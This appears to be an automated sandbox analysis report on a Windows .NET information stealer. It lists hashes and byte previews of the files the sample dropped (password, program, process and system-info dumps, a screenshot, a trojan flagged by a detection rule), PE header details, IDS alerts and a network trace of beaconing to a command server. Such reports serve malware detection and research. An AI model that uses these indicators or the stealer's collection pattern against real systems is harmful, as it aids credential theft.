                                                                                                                                        Preview:PK........(.7V................Cards.txtPK........O.7V................Files\PK........).7Vll.,....L.......info.txt...N.0.EwK..;&.i...:..0.D.....p...4._...:..{.zu....KL...v..SO...'<.>P.Q...;..i..c..f'....../.k.pCG......iP.D.s.....w..G..$...cJ^..@Y.b6.s..nrl.....s<"..4j.,..Z............G...Q.iF..........;.....G..PK........(.7V................Passwords.txtPK........%.7V.f..*...T.......ProgramList.txt.Aj.0.E...a.-!f$.2...]d.....Ul...ec...,.S.P9.......K3.!F.(KM.tT.x...9$.V.-...dk.a9..G6...."....um...).(.,.q.|<.....M.y.`e..Z...S...~l......r..o.2,.@0.........S.@D..9X.yY.e.m:..Txh..."..s....7.Y..o~......n...Q..!QNf...6j.Fxf0..r......f..........<....=.."k..u..j'w.(...b.f..V>..i... ../PK........%.7V....>...e.......ProsessList.txt.U.n.0..#.....R/.A..Z....Wco..?.].../U/<D0..L.f.;;g...h.3Nj................2.'Y..f.|&..k.f.'....`-9..<..Z...i|.m...hwF..m'g...={i.-...$....R7.]{......`8...0n..$.m..}....A|.P...J>H..y.=.....I."...i..8.t..%.....X.^n\@O..'<!..........{.....uo
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1743
                                                                                                                                        Entropy (8bit):4.466343434906543
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:Lcm1FZ6m3Zwm3MmqMVab+tcGanxcg0H13:LV9zJB3Fqwab+yGanOf
                                                                                                                                        MD5:F7A190879742AF43AAAA289131299430
                                                                                                                                        SHA1:63FDBE7DC3C8BABE51A8885877CE19DE87942146
                                                                                                                                        SHA-256:1B81B79F7604DCCC9A4F1B15D1DB33355E5C372EB0EE176E41A79A8A5F27F5E4
                                                                                                                                        SHA-512:A301574B245BD9E86522A34AB433EF884D9AADE347608C41D67C5A4850A4C953F75997926CFAF05AA7C4EFD1F9AD72C365FCF7333FA3B63CDD0772869153B61F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:-----------------------------------------..URL : https://support.google.com/installer/?product={8A69D345-D564-463c-AFF1-A69D9E530F96}&error=0x80040707..Title : Fix problems installing Chrome - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome/answer/6315198?product={8A69D345-D564-463c-AFF1-A69D9E530F96}&error=0x80040707&visit_id=637962485686793996-3320600880&rd=1..Title : Fix problems installing Chrome - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome?p=update_error..Title : Fix Chrome update problems & failed updates - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_error&rd=1..Title : Fix Chrome update problems & failed updates - Google
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1364
                                                                                                                                        Entropy (8bit):5.065215317933012
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:c4cxPUwdVScxPUXUcxSTcHocxMocxtOtocxPUWEcxPUaptcxPUv9p1cxPUPbYcx9:x0PPdVS0PGU0WcHo0Mo0Uto0PHE0PFpJ
                                                                                                                                        MD5:187D97F5AAFF4553BDCE050BEFD951A2
                                                                                                                                        SHA1:596BE74C875F8C9CA08209F696060F03AFDA2E36
                                                                                                                                        SHA-256:43F6D6C018A8DC4837153C78124BFDAEF772FF00D67028A46DFCAFEABCEC18EF
                                                                                                                                        SHA-512:FC608F5E80755ED97DEB818B9B37BBCC7C70EC46E7D6C62B97F4C408DD345190413026FB1C57B3600602421E4174E5E102D73C930F377109CE2B50D8788288D2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:Application Name : Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702....Version : 14.21.27702....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030....Version : 11.0.61030....Installed Date . 20190627....Application Name : Microsoft Office 64-bit Components 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x6
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2405
                                                                                                                                        Entropy (8bit):4.673606179261081
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:fmHtH+H9RHo+qH5HO5HtHOUH5HT1xHP5HLHymHPHtHFoHmHys:fQ5Y91oXNON5OUHNRVPNDyQf5FWQys
                                                                                                                                        MD5:D14A8BBC39F00D86CF0ABB19349E2CA7
                                                                                                                                        SHA1:FF6B7071553BA43B4EF50E65559AAD2619227BA3
                                                                                                                                        SHA-256:8B1E90DD28C1A179A85276AD1367D7F754DD793CA74B22B780D7BBEA2D19DFFC
                                                                                                                                        SHA-512:70EA5BC1B75824A139543BB6A44588B8B673F76FF3BDC2721E6821A85030B3F55DF48A8E5C40D362E72460372B38E1D421AAEB4E32208A747638D5C2E7659388
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:Name : RuntimeBroker....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : services....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : svchost....Name : WmiPrvSE....Name : backgroundTaskHost....Name : sihost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : winlogon....Name : svchost....Name : dwm....Name : svchost....Name : dllhost....Name : svchost....Name : RuntimeBroker....Name : ShellExperienceHost....Name : svchost....Name : svchost....Name : Registry....Name : WmiPrvSE....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : svchost....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : RuntimeBroker....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : RuntimeBroker....Name : svchost....Name : svchost....Name : svchost....Name : SearchUI....Name : backgroundTaskHost....Name : svchost....Name : HxTsr.
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):797919
                                                                                                                                        Entropy (8bit):7.948268932471244
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:Z1ui3zh7AJ2OdXprzlsvRjqunBJtx0i29YlyrTlvgXUZjLMlCHI2yw09k8FbU+UM:DDuJnx0BJgvl/Le8I2h09k8dUNM
                                                                                                                                        MD5:51DC59ED9BB3511AD0E6DD2B17768A4B
                                                                                                                                        SHA1:FDC663EFE761CC8FFD4E73E12A322DE8531B62F2
                                                                                                                                        SHA-256:56EB18214FA4184B87A53C008A2982E7FCC3AB903E6EA75B22E55C6F862501DC
                                                                                                                                        SHA-512:88E4DA29A5BDAFAEA44B902D5DF99CA5D6E9595A2F2F04E5BCC1F359BF6B7AF65DE1DB23AC44CE7F1572FEDD679CEC9A649B5830257194327408F83BB9FBF5CA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...4Gu...+.^/...s@d...YB..l0..x.b.[6 L2....$.. ..BD..".'..D!D.Bd..IH..:.}z.:.VuUO...7.<.g.T8....v...q..4;v...=n....F...n..;Yv.....{...n....v...-Z..8..y..u.~....])..n6......=;...]..{.v.7v}....^.....~}......W...uD.9..z.,..r.|;;X.......!X~.I..{..K[.....V.t.'e"...=n.l..\.q..yv\.KD.r.9a.q6=k.B.k<.....oF.c!AT...m..y6.....b@;%.z&.k+b.E!{...{.}wg...[..Q...>!.{;...c..3..f....}o....._.q...n.......6...* 6+.8.`6..t....W..c.9...2.".8>. ...[..5l..2.+..]...|...O>.../d-*...C.g.r...._.n.+.K...........R..G...<..\H..A..k..Z..'..E..?....3.....C....-.+...F...j...^`i.,.b.i.\...M..M.. #.:%.....0.~. ..OP...|~.3.c.....Rs0..4.........?)..-..........8..7..6..<....Z.......Q..>.s....t....k.0..|C.............!.3H9..../...........N.b.d....8............1g~.C...>*b.m[.Wfq%...-......2X..0.....].@=..../.H......[)............`....@.n...O..D....N..I....o......t...`Z.......p..r.V..,...
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):332
                                                                                                                                        Entropy (8bit):4.579461777700594
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:9lsCF2Rpj1hx0+A7JRXWQuGsLf15Ro1WcEuo8T:fjIpxXKRXWQzsLN5RJcfV
                                                                                                                                        MD5:00346F91FC4AAAE8CFA1ABA31A30615F
                                                                                                                                        SHA1:E4D7781282495A7C5EC8DF80087364BE1CEB97EF
                                                                                                                                        SHA-256:C42F1696272CEEDF6933E59DC8FCCFEE92E41C35183BA7DBB40032A603C8F99D
                                                                                                                                        SHA-512:C4FE386610B5CA975935496CF29414F985766B3B6BAF4E5F70BAC9F7E69DD99B8E4B3E5C2563F8429E13599755D39D0C5A14954839B59EC255C2475164C5D628
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:PC Name : 128757..Operating System : Microsoft Windows 10 Pro..Anti virus : Windows Defender..Firewall : None..Processor : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Memory (RAM) : 8.00 GB..-----------------------------------------------------------------------..-------------Developed By th3darkly [ https://gomorrah.pw ]-------------
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):407776
                                                                                                                                        Entropy (8bit):6.080910017085125
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                                                        MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                                                        SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                                                        SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                                                        SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: nwY3YpWQVx.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 5SUx8Md4kq.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: NicDx0BvqP.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: ngyoL1siem.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtf, Detection: malicious, Browse
                                                                                                                                        • Filename: AvtoKomander_Installer.msi, Detection: malicious, Browse
                                                                                                                                        • Filename: VFMPwzPWjM.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CpLGtq4jBl.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CpLGtq4jBl.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 5Qg0FFYoQd.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: IBK_Minervasoft.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PO BNB Trends.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Bm6U0Vj6pa.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: NEW REQUIREMENT..xlsx, Detection: malicious, Browse
                                                                                                                                        • Filename: kKEMJQNDL.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: doc2022020909100101019.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: hesaphareketi-01.pdf.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32256
                                                                                                                                        Entropy (8bit):5.050531187823917
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:KfkVQ748aUKN6C8/3g2L4QDL0Lk24jXPlfLoem/xYUIoPBsNJc:RW7PTKF8fPdDL42XPUIc
                                                                                                                                        MD5:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                                                        SHA1:A9E6F4AE24ABF76966D7DB03AF9C802E83760143
                                                                                                                                        SHA-256:1632FBFF8EDC50F2C7EF7BB2FE9B2C17E6472094F0D365A98E0DEC2A12FA8EC2
                                                                                                                                        SHA-512:B4575AF98071FC8D46C022E24BFB2C1567D7E5F3DE0D8FB5FEE6F876985C7780A5B145F645725FF27A15367162AA08490AC2F8DD59D705663094FE4E1EEEC7BC
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................D...6.......c... ........@.. ....................................`..................................b..K........1........................................................................... ............... ..H............text....C... ...D.................. ..`.sdata..8............H..............@....rsrc....1.......2...J..............@..@.reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):407776
                                                                                                                                        Entropy (8bit):6.080910017085125
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                                                        MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                                                        SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                                                        SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                                                        SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):5.986542010585417
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • InstallShield setup (43055/19) 0.21%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                        File name:5VXh2VBmA0.exe
                                                                                                                                        File size:549415
                                                                                                                                        MD5:7a483865f3f1999ab24ed75f710649ad
                                                                                                                                        SHA1:b149c60bbc7f1781e76079210da29a55d0b137a3
                                                                                                                                        SHA256:536ac35ca8f6e6ddf85737ad4cabd5631542613ffec3c9b03947aaa2cdc0dcaf
                                                                                                                                        SHA512:7bd126e0112c8b4b284c2e2ab6d3f081cdb169769847508b4b92a443e019164c9c75ed8ab2465b2db6203736f45df8a3556b2e14ef3f60cbaa2fda97dda7686b
                                                                                                                                        SSDEEP:6144:X+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWdG/Wow7+JJUK:OPw2PjCLe3a6Q70zbYow60K
                                                                                                                                        TLSH:43C46A0223FC4BA5E5FE2B31A631424543F6FD46657AE70D0D80E6EA4C777829E203A7
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.a.....................@.......=... ...@....@.. ....................................@................................
                                                                                                                                        Icon Hash:41455554545445a2
                                                                                                                                        Entrypoint:0x483dee
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x618475C5 [Fri Nov 5 00:07:33 2021 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x83d980x53.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x3b58.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x840000x1c.sdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000x81df40x81e00False0.39599186417228105data6.007710958121938IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .sdata0x840000x1380x200False0.2421875data2.1996594710852864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rsrc0x860000x3b580x3c00False0.14055989583333334data4.237480455118393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x8a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_ICON0x865400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512
                                                                                                                                        RT_ICON0x868280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128
                                                                                                                                        RT_ICON0x869500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
                                                                                                                                        RT_ICON0x871f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
                                                                                                                                        RT_ICON0x877600x353PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                        RT_ICON0x87ab80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                                                                                                                                        RT_ICON0x88b600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                                                                                                        RT_GROUP_ICON0x88fc80x68data
                                                                                                                                        RT_VERSION0x862500x2f0SysEx File - IDP
                                                                                                                                        RT_MANIFEST0x890300xb22XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain
                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                        192.168.2.392.249.45.11349708802022818 01/23/23-21:25:29.484357TCP2022818ET TROJAN Generic gate .php GET with minimal headers4970880192.168.2.392.249.45.113
                                                                                                                                        192.168.2.392.249.45.11349707802022818 01/23/23-21:25:23.289815TCP2022818ET TROJAN Generic gate .php GET with minimal headers4970780192.168.2.392.249.45.113
                                                                                                                                        192.168.2.392.249.45.11349712802022818 01/23/23-21:25:39.311255TCP2022818ET TROJAN Generic gate .php GET with minimal headers4971280192.168.2.392.249.45.113
                                                                                                                                        192.168.2.392.249.45.11349715802022818 01/23/23-21:25:47.864338TCP2022818ET TROJAN Generic gate .php GET with minimal headers4971580192.168.2.392.249.45.113
                                                                                                                                        192.168.2.392.249.45.11349718802022818 01/23/23-21:25:59.271301TCP2022818ET TROJAN Generic gate .php GET with minimal headers4971880192.168.2.392.249.45.113
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Jan 23, 2023 21:24:58.911417961 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:24:58.943480015 CET8049702208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:24:58.943727970 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:24:58.945521116 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:24:58.979034901 CET8049702208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:24:59.031476974 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.396599054 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.429296017 CET8049702208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:08.429421902 CET4970280192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.465034962 CET4970380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.497371912 CET8049703208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:08.497500896 CET4970380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.497775078 CET4970380192.168.2.3208.95.112.1
